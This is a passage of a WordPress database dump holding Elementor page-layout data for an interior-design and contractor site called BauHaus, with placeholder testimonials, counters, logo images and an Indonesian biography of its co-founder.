solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3922,4878,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3923,4878,'_elementor_pro_version','3.8.1'),(3924,4879,'_wp_page_template','elementor_header_footer'),(3925,4879,'_elementor_edit_mode','builder'),(3926,4879,'_elementor_template_type','wp-page'),(3927,4879,'_elementor_version','3.8.1');
INSERT INTO `wpev_postmeta` VALUES (3928,4879,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit 